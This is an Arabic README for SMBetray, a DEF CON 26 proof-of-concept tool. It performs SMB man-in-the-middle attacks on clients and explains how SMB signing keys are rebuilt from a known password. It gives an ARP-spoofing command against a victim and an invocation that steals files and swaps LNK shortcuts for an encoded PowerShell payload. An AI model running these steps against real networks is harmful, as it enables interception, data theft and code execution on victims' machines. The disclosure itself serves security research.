
أداة SMB MiTM تركز على مهاجمة العملاء من خلال تبديل محتوى الملفات، وتبادل الروابط (lnk)، بالإضافة إلى اختراق أي بيانات تُنقل عبر الشبكة بنص واضح.
الإصدار 1.0.0. هذه الأداة هي إثبات مفهوم (PoC) لتوضيح قدرة المهاجم على اعتراض وتعديل اتصالات SMB غير الآمنة، بالإضافة إلى اختراق بعض اتصالات SMB المؤمنة إذا كانت بيانات الاعتماد معروفة.
تم إصدارها في مؤتمر Defcon26 تحت عنوان "SMBetray - Backdooring and Breaking Signatures"
في اتصالات SMB، آليات الحماية التي تحمي سلامة البيانات المنقولة بين الخادم والعميل هي توقيع SMB والتشفير. التوقيعات في حزم SMB عند استخدام توقيع SMB تستند إلى مفاتيح مستمدة من معلومات تُرسل عبر الشبكة بنص واضح خلال مرحلة المصادقة، بالإضافة إلى كلمة مرور المستخدم. إذا كانت كلمة مرور المستخدم معروفة، يمكن للمهاجم إعادة إنشاء SessionBaseKey وجميع مفاتيح SMB الأخرى واستخدامها لتعديل حزم SMB وإعادة توقيعها بحيث تُعامل كحزم صالحة وشرعية من قبل الخادم والعميل. بالإضافة إلى ذلك، التوقيع معطل افتراضيًا في كل شيء تقريبًا باستثناء وحدات التحكم بالمجال، لذا فإن الحاجة لكسر التوقيعات نادرة.
الهدف من هذه الأداة هو تحويل هدف هجوم الوسيط (MiTM) على SMB من مهاجمة الخادم عبر اتصالات مرحّلة إلى مهاجمة العميل عبر ملفات ضارة وبيانات مستبدلة/مُخترقة عند سنوح الفرصة. أخيرًا، نظرًا لأن التشفير نادرًا ما يُستخدم، على الأقل تسمح هذه الأداة بسرقة الملفات المنقولة بنص واضح عبر الشبكة - وهو ما قد يكون مفيدًا لجرد النظام، أو ضارًا إذا كانت البيانات المعترضة حساسة بطبيعتها (PCI، PII، إلخ).
يمكن العثور على مزيد من المعلومات الأساسية والعروض التوضيحية هنا https://blog.quickbreach.io/smbetray-backdooring-and-breaking-signatures/
يتطلب نظامًا يستخدم iptables
sudo bash install.sh
أولاً، قم بهجوم تسميم ذاكرة التخزين المؤقت لـ ARP ثنائي الاتجاه بين ضحيتك وبوابة الشبكة أو مشاركات الوجهة، على سبيل المثال:
sudo arpspoof -i <iface> -c both -t <target_ip> -r <gateway_ip>
ثم قم بتشغيل smbetray مع بعض وحدات الهجوم
sudo ./smbetray.py --passive ./StolenFilesFolder --lnkSwapAll "powershell -noP -sta -w 1 -enc AABCAD....(etc)" -I eth0
يمكن العثور على عرض توضيحي للأداة هنا: https://blog.quickbreach.io/smbetray-backdooring-and-breaking-signatures/
مزيد من المعلومات قادمة - حاليًا لا تدعم الأداة اتصالات SMBv1 فقط، وهو ليس مشكلة في 99% من الحالات. الكود قبيح، لكن له شخصية رائعة.